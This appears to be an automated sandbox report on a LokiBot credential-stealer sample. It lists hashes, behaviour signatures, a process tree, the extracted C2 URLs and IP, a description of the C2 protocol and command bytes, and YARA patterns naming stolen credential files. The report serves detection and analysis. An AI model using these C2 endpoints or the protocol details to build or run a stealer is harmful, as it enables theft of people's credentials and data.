Edit tour

Windows Analysis Report
9876567899.bat.exe

Overview

General Information

Sample name:	9876567899.bat.exe
Analysis ID:	1585229
MD5:	6d9798801523ee1c8c5dc83d28346814
SHA1:	66d6c6e65ffb8c635a286d68de624ef5d469cf9b
SHA256:	62e0fac7c5231aa0d8d5f0fdb9e64d8bdadf79934a26577282b7affbc557a5fb
Tags:	exeLokiuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

9876567899.bat.exe (PID: 408 cmdline: "C:\Users\user\Desktop\9876567899.bat.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\9876567899.bat.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

svchost.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\9876567899.bat.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

Dhy2kmz.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Roaming\Dhy2kmz.exe" MD5: CDD3D1BB178C391A905C40D2B292F4D6)

Dhy2kmz.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Roaming\Dhy2kmz.exe" MD5: CDD3D1BB178C391A905C40D2B292F4D6)

WerFault.exe (PID: 7248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996 MD5: C31336C1EFC2CCB44B4326EA793040F2)

wscript.exe (PID: 1292 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

palladiums.exe (PID: 7220 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7304 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7696 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7800 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7884 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7904 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 7980 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 8000 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 8028 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

palladiums.exe (PID: 8096 cmdline: "C:\Users\user\AppData\Local\preinhered\palladiums.exe" MD5: 6D9798801523EE1C8C5DC83D28346814)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://172.245.123.11/tpm/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000004.00000002.2153883300.000000000458C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
